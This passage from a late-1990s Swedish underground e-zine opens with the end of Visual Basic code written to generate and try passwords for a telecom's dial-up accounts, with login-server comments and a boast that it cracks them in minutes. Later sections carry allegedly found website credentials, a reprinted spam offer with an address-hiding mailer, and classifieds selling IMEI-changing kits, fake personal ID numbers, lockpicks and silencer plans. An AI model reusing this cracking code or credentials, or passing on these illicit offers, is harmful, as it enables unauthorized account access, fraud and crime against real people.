"G" Then Y = "D" If X = "H" Then Y = "E" If X = "K" Then Y = "E" If X = "M" Then Y = "F" If X = "N" Then Y = "F" If X = "P" Then Y = "G" If X = "Q" Then Y = "G" If X = "R" Then Y = "H" If X = "X" Then Y = "H" If X = "Y" Then Y = "K" If X = "a" Then Y = "K" If X = "b" Then Y = "M" If X = "c" Then Y = "M" If X = "d" Then Y = "N" If X = "e" Then Y = "N" If X = "f" Then Y = "P" If X = "g" Then Y = "3" If X = "h" Then Y = "3" If X = "p" Then Y = "4" If X = "q" Then Y = "4" If X = "r" Then Y = "5" If X = "x" Then Y = "5" If X = "y" Then Y = "6" pass = pass + Y ´Här lägger den till nästa tecken i lösenordet X = Y Return codes2: If X = "2" Then Y = "Y" If X = "3" Then Y = "Y" If X = "4" Then Y = "a" If X = "5" Then Y = "a" If X = "6" Then Y = "b" If X = "7" Then Y = "b" If X = "8" Then Y = "c" If X = "9" Then Y = "c" If X = "A" Then Y = "d" If X = "B" Then Y = "d" If X = "C" Then Y = "e" If X = "D" Then Y = "e" If X = "E" Then Y = "f" If X = "F" Then Y = "f" If X = "G" Then Y = "g" If X = "H" Then Y = "g" If X = "K" Then Y = "h" If X = "M" Then Y = "h" If X = "N" Then Y = "p" If X = "P" Then Y = "p" If X = "Q" Then Y = "q" If X = "R" Then Y = "q" If X = "X" Then Y = "r" If X = "Y" Then Y = "r" If X = "a" Then Y = "x" If X = "b" Then Y = "x" If X = "c" Then Y = "y" If X = "d" Then Y = "y" If X = "e" Then Y = "2" If X = "f" Then Y = "2" If X = "g" Then Y = "P" If X = "h" Then Y = "Q" If X = "p" Then Y = "Q" If X = "q" Then Y = "R" If X = "r" Then Y = "R" If X = "x" Then Y = "X" If X = "y" Then Y = "X" pass = pass + Y ´Här lägger den till nästa tecken i lösenordet X = Y Return 90 ´Connecta med din FTP/POP3-Control här! Till exempel: ´control.host = "m1.800.telia.com" ´Pröva gärna POP3 ´control.logonname = "u80000000" ´control.logonpass = pass ´Borde vid första försök vara: y689AAAA ´control.connect ´Eftersom vi inte har tid o joxa med det nu så ändrar vi bara formens Caption Form1.Caption = pass ´Menytexten på Form1 blir till det aktuella lösenordet. GoTo 100 99 ´Lägg in alla errorkoder här! 100 End Sub ´Ett par sista ord från producenten: ´ ´Jag måste säga ett Telias System suger! ´Att en 16 åring (MVG i matte då ;) som nyss gått ut 9:an ska kunna göra ett ´program i Visual Basic som knäcker deras lösenord inom några få minuter är ´faktiskt alldeles för skamligt. ´ ´E-Post: tomtarna@hotmail.com ´IRC: #020.se, DALnet ´URL: http://netking.ml.org/nemesis/ (skicka epost eller någe om den inte funkar) ´ ´Vi vill INTE ha några frågor om source-koden! ´ Anonym @ #020.se __________________________________________________________________________ 12. FARLIG ICQ FLOODARE ========================== För Er som testat ICQ floodaren ICkiller utfärdas extrem varning. Detta är ett program som exploitar datorn ganska kraftigt och gör Windoze mer instabilt än det redan är som en bi-effekt. Har du kört ICkiller och installerat .OCX filerna så bör du genast gå till denna URL och noga följa/läsa innehållet. http://members.tripod.com/~hakz/ICQ/index.html .OCX filerna http34.ocx och dssock32.ocx som man måste installera med regsvr32 kan enkelt avinstalleras genom att man kör regsvr32.exe/u http34.ocx i C:WindowsSystem För att kontrollera om man är exploitad kan man enkelt köra CTRL-ALT-DELETE och ta sig en titt. Ligger det två stycken Explorer öppna, och kanske RegEdit också så är du utsatt. Fake Explorer skickar känslig information till programmeraren bakom ICkiller. explorer.exe ligger i C:Windows, medans fake-explorer ligger i C:WindowsSystem För att säkra sig kan man kolla egenskaperna hos Explorern i SYSTEM katalogen. Står det att versionen är engelsk och att versions-numret slutar på .950 är det med hög sannolikhet fake-explorern. För att åtgärda detta bör du först avsluta Fake Explorern genom att använda CTRL-ALT-DELETE. Eftersom riktiga explorer.exe laddas först så bör den undre explorern vara den falska. Avsluta den och radera sedan fake-Explorern från HDn tillsammans med hela ICkiller. Även dom 1.exe filer den skapat. Sök HDn efter sådana filer och ta bort allihop. Har du nu fått bort dom falska .OCX filerna (ersatt dom med originalen om sådana fanns?) raderat exploit-explorer och hela ICkiller så bör du vara säkrad. Detta var en kompirmerad och försvenskad version av informationen på URL:en ovan. Och ett gott råd läsare: Akta er noga för att köra oseriösa program som mifflar om i Systemet. Det kan äventyra Din integritet samt din dators säkerhet om Du inte redan insett det. Dr Shaddack __________________________________________________________________________ 13. ANONYMITETS SERVERN ZOOM LÄGGS NED ========================== Zooms anonyma remailer har lagts ner, tjänsten kommer inte att återupptas. Remailern var aldrig avsedd som en publik tjänst och på senare tid har trafiken till remailern varit för hög, samt att antalet mail till oss på zoom angående remailern varit påfrestande många. Om du vill veta mer om anonyma remailers, besök istället http://www.stack.nl/~galactus/remailers/ __________________________________________________________________________ > > > P O L I T I K & T E R R O R I S M < < < __________________________________________________________________________ 14. INVANDRARE DÖMD FÖR HITLERHÄLSNING ========================== En 20-årig iranier jobbade som bartender på en danskrog när några kamrater vinkade till honom från dansgolvet. En tjej i sällskapet gjorde på skoj en hitlerhälsning. 20-åringen svarade med samma mynt, skriver tidningen Hallands Nyheter. Allt var på skoj men en adopterad indier som befann sig i lokalen tyckte inte att det var roligt. Han polisanmälde bartendern för hets mot folkgrupp. Iraniern dömdes i måndags till 300 kronor i böter av Halmstads tingsrätt, dock inte för hets mot folkgrupp utan för förargelseväckande beteende. [Källa: TT] __________________________________________________________________________ > > > F L A S H B A C K < < < __________________________________________________________________________ 15. FLASHBACK FOUNDATION ========================== Flashback drivs helt idéelt och utan vinstintresse. Det har den alltid gjort och kommer alltid att göra. Den drivs helt fristående från yttre inblandning av såväl stat som etablerade mediakoncerner. Flashback har även valt att avstå från press stöd (kulturtidskrifts stöd) och intäkter från såväl annonser som sponsring. Detta för att kunna fortsätta vara opartisk och kritiskt granskande. Flashback är dock mer än bara en tidning. Flashback driver en mängd andra projekt (även dessa dessa idéelt): Flashback Records Flashback Books Flashback Television Flashback Software Flashback News Agency Flashback Community För att kunna erbjuda dessa tjänster och för att framförallt kunna erbjuda dessa tjänster kostnadsfritt (alt. självkostnadspris) så behövs pengar. Pengar som kan investeras i allt från modem till modempooler till att bekosta tryckning av böcker av nya författare eller helt enkelt påbörja fler nya projekt. Flashback kommer att fortsätta sitt arbete oavsett ditt bidrag. Flashback har funnits i över 15 år och vi har inga planer på att lägga ned verksamheten. Men med mer pengar kan vi erbjuda bättre och framförallt fler tjänster. Flashback Foundation är bl.a. startat för dig som vill ha: Flashback Community utan månadsavgift Hemsidor utan passwords & reklam för porr siter Flashback News Agency (FNA) gratis och utan reklam Flashback magazine utan 33% reklam Fler mailinglistor, nyhetsgrupper och påbörjade projekt Nej, Flashback har inga planer på att börja ta betalt för någon av sina gratistjänster, lika lite som vi kan tänka oss att ta emot annons pengar. Stöd oss ifall du har pengar. Sätt in en extra slant nån gång då och då ifall ekonomin tillåter. Är du fattig? Njut av vår verksamhet. Vi finns kvar och du är ändå alltid lika välkommen tillbaka. Be strong - be wrong... Flashback Foundation Box 676 114 79 Stockholm Postgiro: 39 64 28-5 | Bankgiro: 5355-6866 URL: http://www.flashback.se/foundation/ __________________________________________________________________________ 16. FLASHBACKS LOGO IN ASCII ========================== ###### # # # ## # # ## # # ## # # ## # ############## ## ############## # ######## ### ## ### ######## # # ####### #### ## #### ####### # # ###### ##### ## ##### ###### # # ##### ## ## ## ##### # # ###### ## ######## ## ##### # # ### ### ## # ### ###### # # ## #### # #### # ### ## # # # ## ## ## ## ## ### ## # # ## #### # ## ## ## # # ##### # # ### ## #### #### ### ## ### # ##### ## ### ## #### # ##### ##### # ## ### # ### ## ##### ##### # ### ### ### ## # ###### ############ # ## # ## # ## ############# # ############ ## ## #### ## ## ########### # ############ # ## # ## # ## # ########### # # ## ## ### #### ### # # ######### # ## ##### #### ## # ########## ##### ## #### ## #### ## ##### Flashback Logo in ascii # ### ## #### #### #### ## ### # By: Cerial Phreak ## #### # ## ## ## ## # ##### # www.flashback.net/~cerial/ # # ## #### ## # ## ### ## # # # ## #### # #### ####### ## # # ####### ### # ## ####### # # ###### ## ####### ## ###### # # ##### ## ## ## ##### # # ###### ##### ## ##### ###### # # ####### #### ## #### ####### # # ######## ### ## ### ######## # # ## ## ## # ############## ## ############## # ## # # ## # # ## # # # ###### __________________________________________________________________________ 17. VIKTIG INFORMATION ANGÅENDE FLASHBACKS MAILINGLISTOR ========================== Flashback driver totalt 5 mailinglistor: - Whorse - Community - Warez 4 PC - Warez 4 Mac - Root XS Samtliga mailinglistor är ´slutna´ och enbart tillgängliga för kunder hos Flashback Community. För att kunna ansluta sig till någon av dessa listor så måste din förfrågan göras från en flashback.net-adress. Din förfrågan om medlemskap NEKAS ifall du gör din förfågan från en annan adress (t.ex. algonet.se, hotmail.com etc). OBS!: Detta publ. då vi fortfarande får mellan 10-50 förfrågningar varje dygn om medlemskap från personer som saknar en flashback.net adress. __________________________________________________________________________ 18. NYHETER PÅ FLASHBACKS HEMSIDA ========================== Här kommer en kortfattad genomgång över de sidor som har uppdaterats senaste veckan. Flashbacks WWW Guide URL: http://www.flashback.se/www/ Ny och helt omgjord WWW guide. Alla länkar funkar !!! Hjälp oss gärna att komplettera med bra länkar som vi missat. Observera dock att detta bara är en beta version än så länge. Den är dock klar inom de närmaste veckorna, och är då minst dubbelt så stor. Flashback Underground Adress Guide URL: http://www.flashback.se/underground/ Nu äntligen med egen hemsida. Fler områden som lista över skivbolag och fanzines/underground tidningar kommer inom kort. Sedan har även följande sidor tillkommit: Flashback Records: http://www.flashback.se/rec/ Flashback Books: http://www.flashback.se/books/ Flashback Television: http://www.flashback.se/tv/ Flashback Foundation: http://www.flashback.se/foundation/ Fler nyheter kommer att presenteras i nästa FNA. __________________________________________________________________________ 19. FNA BOKEN SÅLDE SLUT SAMMA DAG ========================== FNA-boken som vi berättade om i förra veckan sålde slut på bara några timmar. Inom några dagar hade vi fått flera hundre beställningar, och vissa erbjöd över 2000kr för den. 15 exemplar kommer att säljas, och vi kommer att kontakta köparna under den kommande veckan... URL: http://www.flashback.se/books/ __________________________________________________________________________ > > > R E L I G I O N / F I L O S O F I / K O N S P I R A T I O N < < < __________________________________________________________________________ 20. GUD TILL SALU: KRISTENDOMEN EN MILJARDINDUSTRI ========================== Förkortningen ´WWJD´ låter som en amerikansk radiostation. Men det är inskriptionen i ett halsband där bokstäverna står för ´What would Jesus do´ - ´vad skulle Jesus göra?´ Halsbandet är det senaste i en uppsjö av kristna produkter som i dag tros omsätta nära 23 miljarder kronor varje år i USA. Ett annat exempel på den kristna köpfebern är Veggietales, en video för barn i vilken olika grönsaker sprider käcka kristna budskap. I avsnittet ´Where´s God When I´m Scared - var är Gud när jag är rädd?´ spelas huvudrollen av en gurka och en tomat. Efter Sesame Street är den USA:s mest sålda barnvideo i dag. Antalet affärer som säljer kristna prylar har fyrdubblats sedan 1989. Förra året var kristen skönlitteratur den störst växande genren på den amerikanska bokmarknaden. Samtida kristen musik är i dag större än jazz och klassisk musik. Även icke-religiösa företag börjar investera i den kristna kommersen. Butikskedjan Wal-Mart har nu speciella kristna avdelningar och de etablerade skivbolagen slåss om den kristna musiken. De kristna företagens reaktion är att slå samman mindre företag till större. [Källa: Economist / Metro] __________________________________________________________________________ 21. INTERVJU MED JOHANNES SONESSON (SATANIST & GRUNDARE AV BELIAL CENTER) ========================== 1. Vad är Belial Center? Ett "syndens näste" i Sverige med huvudinriktning på distribution av böcker om Satanism och Mörk magi, rituella tillbehör etc. etc. 2. Vad var syftet med Belial Center när det startades? Tanken var som sagt att försöka skapa en knytpunkt, ett centrum för "Satan", de mörka tankarna, filosofin och magin. Ett ställe där "synden" skulle frodas, där likasinnade lätt skulle kunna få kontakt med likasinnade. Och att tillhandahålla material som annars var väldigt (ibland omöjligt) att få tag i, vilket jag personligen hade problem med, detta var också anledningen till att jag tog intiativ till att starta upp Belial Center. 3. Tycker du att ni lyckats väl med detta syfte? Ja relativt. Men även om många har hört talas om oss, har vi mycket arbeta kvar framöver. Vi har också fått väldigt mycket positiva brev och uppmuntrande ord, så det känns verkligen som vi uppskattas och behövs av alla de som är intresserade av de mörka sfärerna av ockultismen och eller den Satanistiska livs-synen. 4. Hur kom det sig att ni startade upp Non Christian Generation, och ge en förklaring av vad det är samt vilka mål föreningen har! Syftet med kampanjen, som egentligen skulle ha startat under sommaren 1996, var att försöka vända den ofta felaktiga och snedvridna bilden av Satanism i media samt i Svenssons huvud. Kampanjen ser dock ut att kunna komma igång riktigt nu under året, folders och information kommer att skickas ut till ca 200 berörda. Föreningen Non Christian Generations mål är att samla ihop alla ensamvargar, så att vi tillsammans kan bygga upp en stark Satanistisk organisation. Vi vill även försöka ge så många som möjligt tillgång till information där de får en äkta och ärlig bild av Satanismen. 5. Har du hört talas om en organisation som heter "Youth against Christ?" och som bland annat ALTAR gör reklam för på sina skivor? Nej, tyvärr inte. 6. Vore det inte en idé att försöka samarbeta med andra organisationer som denna för att kunna växa sig starkare? Jo det är väldigt intressant som jag sa tidigare. Och vi välkomnar alla organisationer, brödrar och systrar på den mörka stigen att ta kontakt med föreningen. Tillsammans är vi starka! 7. Har ni stött på några problem med myndigheter eller kyrkan med Belial Center eller "Non Christian Generation"? Inget konkret. Säpo och polismyndigheterna har granskat oss lite närmare. Men varken vi eller våra medlemmar har haft några problem med dessa, och då vi försöker informera dessa upplever dom oss inte längre som något hot. Kyrkan har nästan alltid undvikit oss, men de som har försökt attackera oss har vi snabbt snäppt av. 8. Ni vill alltså ändra Svenssons syn på satanismen, men varför syns ni då aldrig i media, tex någon kvällstidning som säkert skulle vara intresserade av att höra vad ni håller på med? Vi har faktiskt medverkat 2-3 ggr. på TV, och figurerat i ett flertal olika tidningar. Men vi kommer definitivt att synas mera inom den närmsta tiden. 9. Vilken är enligt er Svenssons nuvarande syn på satanismen? Till 90% tror de på allting som tidningarna skriver, vilket gör att de oftast förknippar Satanismen med psykopater, barnoffer, kyrkbränder, blodiga ritualer etc. etc. 10. Definiera satanismen som den är enligt dig! Vad krävs för att vara satanist, måste man vara ond och taskig? För mig själv (och många många andra) är Satanismen en filosofi och ett sätt att se på saker och ting. Personligen tycker jag detta är en väldigt sund "religion" som känns helt rätt och naturlig. Tvärtemot vad många tror handlar inte den moderna Satanismen om att dyrka Djävulen eller hans demoner. Här är en parallell jämförelse, kristendomen handlar i grund och botten om att förneka "synderna" så att du blir "ren" och får komma till "himmeln" och leva i all evighet med en schizofren och paranoid Gud (Jahve). I den judiska mytologin symboliserades folkets synd av en Syndabock som offrades en gång om året för att blidka Guds vrede över synden, det vill säga deras naturliga leverne. Satan (Getabocken) kom senare till att bli alla de så kallade synderna personifierad. Satanismen (Synd-ismen) handlar alltså egentligen om en filosofi som accepterar människan som hon är, om vi skall använda kristen terminologi - syndig, med alla hennes naturliga drifter, och som både "ond" och "god". Tyvärr är detta inte den bild de flesta har av Satanismen. Kyrkan har under århundraden försökt måla upp Satanismen som det hemskaste som kan tänkas existera. Syftet med denna propaganda förstår nog egentligen vem som helst. Genom att skrämma massorna med en levande bild av Satan som ett verkligt väsen, Helvetet och med Mörkmagikernas förmodade blodfyllda cermonier, är det ganska lätt att hålla fast de troende i sin banala tro. Vem skulle för bara några århundraden tillbaks våga att inte döpa in sina barn i kyrkan? Alla har ju hört vad Djävulsdyrkarna gör då och då med odöpta barn..... Denna bild lever otroligt nog till stor del kvar i dagens samhälle, mycket kanske tack vara massmedias sensationsjournalistik samt filmens och litteraturens flitiga användande av kyrkans Fantasi och Mytprodukter. Faktum är att inte före 1966 började den lite större publiken att inse vad modern Satanism (i motsatts till den tradionella kristna versionen) egentligen är. Detta var det år som amerikanen Dr. Anton LaVey stolt proklamerade att Satans Kyrka (Syndens Kyrka) hade öppnats. Tre år senare publicerades hans bok, Den Sataniska Bibeln, som fram till idag, tillsammans med hans övriga verk har sålts i över 2 miljoner exemplar. De som faktiskt Dyrkar den kristna bilden av Satan eller de Mörka Gudarna överhuvudtaget brukar idag oftast betecknas som "Djävulsdyrkare". Den som utger sig för att vara Satanist, men som följer den gamla Satanismens ideal bör även den anta denna namn. 11. Tror du att alla satanister håller med dig om denna definition? Nej, men säkerligen den övergripande delen. LaVey myntade till stor del dagens Satanism, och hans grundläggande definitioner kommer inte kunna rubbas i första taget. Men jag har ändå stor en respekt för de som inte delar mina åsikter. Och jag tycker i grund och botten att "Djävulsdyrkaren" och "Satanisten" står varandra väldigt nära, vi delar ju till stor del samma livs-filosofi och vi upphöjer det syndiga livet och ser Satan som den "ultimala förebilden". 12. Anton LaVey, vad anser du om honom? Det finns ju grupperingar av satanister som inte alls tycker att hans ideer om satanismen är riktiga. En bra ledare som levde sitt liv i enlighet med sin vilja och som lyckades nå ut med sitt budskap. Men faktum är att nästan inget av de han skrev var något nytt, snarare en samling av äldre skrifter som togs fram i ljuset igen i en ny form. 13. Hur reagerade du när du fick höra om hans död? Tyckte att det var lite synd att jag inte han träffa honom personligen. 14. Hur blev du satanist och har du aldrig tvivlat på din tro? Satanist blir man inte - man födds till det!.... Jag läste "The Satanic Bible" för flera år sedan och kände att det är Människans rätta jag, detta känns helt och fullt rätt. Tvivlat har jag nog aldrig gjort, men givetvis har jag funderat mycket, men det finns nog inte någonting som skulle kunna få mig att konvertera till någon annan "religion". 15. Anser du dig vara en religiös människa? Inte i vanlig mening. 16. Måste man inte tro på gud och erkänna jesus för att vara satanist, satanismen är ju född ur kristendomen? Nej. Filosofin har inte sina rötter, bortsett från de yttre attributen, i kristendomen som man kanske skulle kunna tro. I stället härstammar den från urreligionerna och från djupet av människans eget psyke. Man skulle kunna säga att Satanismen är manifestationen av den Vänstra handens väg. Skillnaden mellan den Vänstra och den Högra handens väg (i nästan alla kulturer) är att den första står för utvecklandet av det egna jaget, medan den andra försöker hämma detta, genom förening med "Gud", eller strävan för att bli ett med universum (Nirvana). Sammantaget, den Vänstra handens väg säger att du skall sträva efter att bli din egen gud - efter ditt egna personliga koncept. Poeten Aleister Crowley utryckte det så här: "Det finns ingen Gud utom Människan, varje man och kvinna är en Stjärna., Gör vad Du vill skall vara den enda Lagen". Alla är potentiella gudar och det är bara du själv som kan avgöra vad som är rätt och fel för dig, du har alla förutsättningar - gör det Du vill av livet! Den motsatte vägen, kristna, hinduer, muslimer, buddister mfl. säger att individen skall ge upp sin egen identitet, och genom att göra detta, bli ett med "skaparen" efter döden. Satanisten insisterar på att vi är separerade från alla gudar och skapare. Med detta synsätt tillåter vi oss själva att vara den Högste, ta kontrollen över våra liv, uppfylla våra drömmar och "egoistiska" mål. 17. Vad särskiljer egentligen satanismen från extremliberalismen? De filosofiska ideerna är näst intill identiska. Satanismen ser även till människans rituella behov (magiko-antropologi). Dessutom sträver vi för att få kontakt med hela vårt medvetande, att bli starkare och utnyttja vår potenial till det maximala, denna strävan och utveckling finns inte i extrem-liberalismen. 18. Vad anser du om åsikten att satanister bara är vår tids punkare, finniga tonåringar som hittat lite snett under sin tonårskris? Väldigt fel, då majoriten i Belial Centers kontaktnät är över 25 år.... 19. Vad tror du kommer att hända med religionerna i framtiden? Dom flesta kommer förhoppningsvis att dö ut. Det är dags för den Mörka prinsen att stiga upp och ta sin tron i besittning. Satans Tidsålder är här! 20. Känner du att ni på Belial Center och i Non Christian Generation har en funktion att fylla i denna utveckling? Självklart! +++ Ytterligare info: Belial Center, Box 96, 451 15 Uddevalla Tel: 0704-814 809 [Intervjun är gjord av. Janos] __________________________________________________________________________ > > > N O T I S E R / Ö V R I G T < < < __________________________________________________________________________ 22. FALSKA ENTRÉBAND TILL HULTSFREDS FESTIVALEN TILL SALU ========================== Den unga kvinnan försökte sälja entréband till den förestående rockfestivalen till en man på gågatan i Hultsfred. Men den utvalde kunden råkade vara rockfestivalens egen ordförande. Och några entréband till festivalen finns ännu inte ute. Det är först i festivalkassan som besökarna får sitt armband. Så i stället för pengar i fickan fick kvinnan följa med till polisen, skriver Vimmerby Tidning. [Källa: TT] __________________________________________________________________________ 23. PLATSANNONS: BÖDEL SÖKES ========================== Det finns ett jobb ledigt i kungadömet Swaziland, i södra Afrika. För att klara av jobbet behövs ingen erfarenhet, anser arbetsgivaren, men sökande måste vara redo att jobba på helgerna. Det Swaziland letar efter är en ny bödel. Dödsdomar verkställs genom hängning. Det har inte skett sedan 1984, men det finns åtta dödsdömda som väntar. Tidigare delade Swaziland bödel med Botswana och Lesotho. [Källa: TT-Reuters] __________________________________________________________________________ 24. FRÅGOR & SVAR ========================== # F R Å G O R ÄR DET OLAGLIGT ATT SPRIDA SERIE NUMMER? Får man lägga upp serienummer till kommersiella program på sin hemsida. Jag hotas nu av 500.000 i skadestånd av bl.a. BSA ifall jag inte tar bort min ´Serial Numbers Page´. Sluggo ************************************************************************** # S V A R RE: VILKA REGLER GÄLLER ANG. MP3 Gränsen går när du kopierar upphovsrättsskyddat material... Alltså, om du mp3´ar ner nån annans skiva och lyssnar på den själv. Då har du gjort dig skyldig till piratkopiering och kan dömas till en massa skit, skadestånd och grejer. Däremot så kan du ta alla dina Egna skivor, som du köpt, och mp3´a dem och lägga dem på en cd... Man får alltså kopiera dem för privat bruk. Du får däremot inte sälja dina mp3-skivor sedan, och ej heller ge bort dem om jag inte har fel... för då handlar det återigen om piratkopiering... Hemsidor med mp3 kan du tipsa folk om hur mycket du vill, då allt som finns på nätet är offentligt. Men du får inte ta ner, och använda musiken som finns på sidorna utan upphovsmannens tillstånd. Powered By Will __________________________________________________________________________ 25. FEEDBACK ========================== RE: 57 MILJONER E-MAIL ADRESSER SÄLJES FÖR 750 KR "Reklam, eller "spam", via epost har blivit en jätteindustri där register över e-postadresser blir allt värdefullare. Den norska nättidningen GuruNEWS kunde nyligen berätta att man erbjudits köpa 57 miljoner e-postadresser för 99 dollar (ca 750 kronor) av företaget Cyber Bulk. I köpet ingår även e-postprogrammet Stealth Mailer som automatiskt lägger in en falsk avsändare (spammare vill gärna vara anonyma)." Här kommer erbjudandet i sin helhet. Tycker det första var lite väl tunt och kortfattat för ett i annars så pass frispråkigt organ som FNA. ;-) +++ Subject: E-Mail anything to 57 million people for only $99 Date: Mon, 08 Jun 98 21:11:13 EST From: favvafeephjmg.com@grommit.magnet.com Reply-To: web@favkjmnhgg.com To: Friend@public.com 57 MILLION EMAILS FOR ONLY $99 INCLUDES STEALTH MAILER That´s right, I have 57 Million Fresh email addresses that I will sell for only $99. These are all fresh addresses that include almost every person on the internet today, with no duplications. They are all sorted and ready to be mailed. That is the best deal anywhere today ! Imagine selling a product for only $5 and getting only a 1/10% response. That´s $2,850,000 in your pocket !!! Don´t believe it? People are making that kind of money right now by doing the same thing, that is why you get so much email from people selling you their product....it works ! I will even tell you how to mail them with easy to follow step-by-step instruction I include with every order. These 57 Million email addresses are yours to keep, so you can use them over and over and they come on 1 CD. I will also include the stealth mailer - this is a full version of the incredibly fast mailing program that hides your email address when you send mail so no one will find out where it came from and you won´t lose your dial up account. The stealth mailer is an incredible program and absolutly FREE with your order ! If you are not making at least $50,000 a month, then ORDER NOW. ORDER NOW BY FAX: Simply print out this order form and fax it to us along with your check made payable to: Cyber Bulk for only $99. Our Fax # is: 760 430 2220 We will confirm your order by email and then mail your cd out via priority mail. Name:_____________________________ Street Address:______________________________ City:_____________________ State:________________ZipCode:_____________ Phone number:__________________________ Email:_______________________________ Tape your check here. Returned checks are subject to $25 NSF Fee. Fax it to 760 430 2220 Or You can mail a check or money order to: Cyber Bulk 167 Hamilton ST Oceanside, CA 92054 If you want to be removed from our mailing list just send a email here +++ Spam King ************************************************************************** RE: CITAT Citatet "Övertygelser är ett större hot mot sanningen än lögnen." som förekom i FNA #101 är inte av någon "okänd". Det var Friedrich Nietzsche som sa (eller skrev?) det. Källor: http://www.innocence.com/~durrell/sig.html http://home5.swipnet.se/~w-50805/quotes/index.html /Lars ************************************************************************** RE: ICQ > det är omöjligt att upptäcka Frodo innan informationen förstörts och > han klarar av att angripa alla filtyper. Den som skrivit ovanstående är totalt okunnig om virus. Det är självklart möjligt att upptäcka ett virus innan det gör skada! Dessutom verkar det ganska dåligt att det inte anges vilken dator det gäller (PC antagligen, vanligast), och vad den infekterar (MS-Office dokument, windows 16 bit, windows 32 bit [NT, 95, 98], ms-dos EXE/COM, linux-elf, bootsektor, MBR är några exempel på vad om kan infekteras på en pece...) Är ni oroliga för virus, läs VLAD, Insane Reality, Nuke Info-Jurnals och allt vad dessa virii-magazine heter så att ni lär er åtmistone grunderna i vad virus är och hur det fungerar, så får ni en viss förmåga att se igenom rena skrönor. bluefish ************************************************************************** RE: FOLKMORD I PROFITENS TECKEN Läste just din insändare i Flashback#101. Vad jag inte förstår är vad du har imot Shell. Visst har dom inte samma policy i alla länder i världen, för att det inte fungerar på samma sätt i alla länder, tyvärr. Man måste respektera seden dit man kommer...även om den är så vidrig som du beskriver den. Shell är ett stort företag med viss kraft att tycka saker men dom kan inte (och tjänar inte på det heller) vända på sättet att göra saker i tex Nigeria. Om Shell skulle kräva av Nigeria att visa en politik som strängt kontrollerar vart avfall dumpas samt att minoriteter inte skadas av Shells utbyggnader så skulle Shell få lämna landet totalt. Shell har med all säkerhet försökt få reda på var dom kan dumpa avfall och liknande vid behov (på grund av att göra det på lagliga medel kostar ofantliga mängder pengar och höjer bara bensinpriset) av Nigerias styre. Nigeria svarar vart dom kan dumpa sin smörja vilket Shell lyder. Punkt. Shell är ett företag som alla andra. Företag har ett enda mål......profit. Profit gör att folk överlever, lever och ibland lever lite för bra än dom förtjänar. Men detta är livet. Givetvis är det helt oacceptabelt att skräpa ner vår planet i onödan. Men oroa dig inte. Blir Jorden för nersotat finns det bara en förlorare. Människan. Att banka på Shell har mycket lite betydelse. Dina åsiker är som kommunismen. Fin tanke men inte långt om länge genomtänkt. Utan dagens nerskräpning av tex trafik, macdonaldspapper, rengöringsmedel, målarfärgsburkar från att måla samtliga saker vi köper och så vidare, så skulle vårt sätt att leva få sträcka sig tillbaka till sen stenålder. Nerskräpning av jorden började redan före år 0. Viadukterna i Rom tex. Så fort det finns platsen som man kan ´dumpa´ saker och falskt tro att det försvinner så kommer nerskräpning finnas till (olja är inget nytt påhitt). Men jag håller med dig om att vi borde hitta bättre vägar...kanske en komplett lösning till hur vi kan göra rent radiaoaktivt avfall till ofarligt kisel (småsten som ligger i uppfarter på fina hus). Ingenting är omöjligt....men att tracka ner på Shell som du gör tycker jag är rent sakt barnsligt. Jonas Hansson ************************************************************************** PASSWORDS Mors! Lösenord jag har hittat med hjälp av WWW Hack (som ni hade med i något nummer) http://www.swedishgirls.com Anvnamn & pwd: Matthew http://www.2sexy.com Anvnamn & pwd: zxcvbn Om det nu kan vara till någon nytta, vad vet väl jag...Hursomhelst, information skall vara fri. CY£Uß __________________________________________________________________________ 26. SVARTA BÖRSEN (KÖPES & SÄLJES) ========================== # S Ä L J E S Utrustning för att låsa upp ericsson telefoner. Man kan byta IMEI nummer och ta bort telefonlås. Pris: 3500 kronor Email: sorder@hotmail.com Ritning på hembrännare enligt lågtryck och återrinnings principen. Email: django75@hotmail.com Markeringsätare Ritningen till den nya Markeringsätaren som klarar AXE-systemet. Endast 70:- plus postförskottsavg. Email: pelle62@hotmail.com Northern Lights #5 Cannabis frön. Billiga priser och bra kvalitet! Email: weed_us@hotmail.com Videofilmer. Har ett ganska stort utbud med blandannat filmer som : Djävulens Advokat, I Know What You Did Last Summer, Jackie Brown, The Jackal, L.A. Confidential, Tomorrow Never Dies. Pri: 65kr per film. Email: xman77@hotmail.com Cigg på postorder Email: hn@oden.se Svarta Dr Martens 10-hålskängor med stålhätta Stlk 9 = 43-44. Helt nya och oanvända. Pris 600:- Stockholmsområdet Email: benway@bigfoot.com Cigaretter Alla märken, 220.-/limpan Minst 3 limpor (6, 9, 12...). Portofritt. Förskottsbetalning. Email: peterkarls@altavista.net Spel och Nyttoprogram. Stort utbud, bra priser. Email: cdskivor@mail12.calypso.net Nya Filmer 80-100:-st inkl band & frakt. Email: powerball@rocketmail.com HK Movie Society Importerade original Hong Kong videofilmer till mycket bra pris! Alla filmer är av högsta kvalite. Widescreen och engelsk text. Email: m.stenman@swipnet.se Personnummer Pris: 15 kr/st. Skriv hur gammal du vill vara och när du vill vara född. Email: hata_felia@hotmail.com # K Ö P E S BMWs dataprogram. BMWs program för att testa motorn, ställa tillbaka servicmätaren och milen. Utrustning alternativt tjänsten köpes. Email: hmon@mail.film.su.se Information om Nationella Insattsstyrkan & SÄPO. Email: oskarv@hotmail.com Dyrkar av alla slag. Med beskrivning, gärna dyrkpistol. Email: Kexman@hotmail.com Slutproven i teori för flygcertifikat (A-cert) Email: svin47@hotmail.com Sprit Email: Mekka@hotmail.com Nationalteatern video Nästan alla band på hultsfreds festivalen filmas. 1995 var Nationalteatern där och om dom filmades vill jag väldigt gärna köpa den videon... Också intresserad av Ramones videon från Johanneshov 1991 Email: progge@hem2.passagen.se Billiga EU Cigaretter Email: hn@oden.se E-mail-adresser Exemplelvis alla Algonets eller Telenordias kunder. Email: revben@hotmail.com VHS filmer, oklippta. Behöver ej vara svensk text, förutsatt att de talar engelska i filmen. Är främst på jakt efter filmer som Evil Dead 1/2. Bra kvalité. Email: knaglfar@ThePentagon.com Körkortsproven. Email: to_eazy@rocketmail.com Billiga cigaretter! Jag kan köpa ganska stora partier regelbundet! Email: klydd@hotmail.com Dyrkset. Email: kim_h@hotmail.com EU körkort Email: idcardneeded@hotmail.com Info om hur man med hjälp av ett kreditkortsnummer kan få reda på kortinnehavarens namn och hemadress. Email: live_life@hotmail.com Ljuddämpare. Till gevär, el ritning.. Email: cjl@death-star.com Dyrkset Email: charluuz@hem1.passagen.se Information angående hackade Telefonkort och Comviq-Kontant-Kort. Email: Simon_Karlsson@Yahoo.com Stora volymer av email adresser. Email: hn@oden.se # B Y T E S Synthvideos Byter videos (även live) 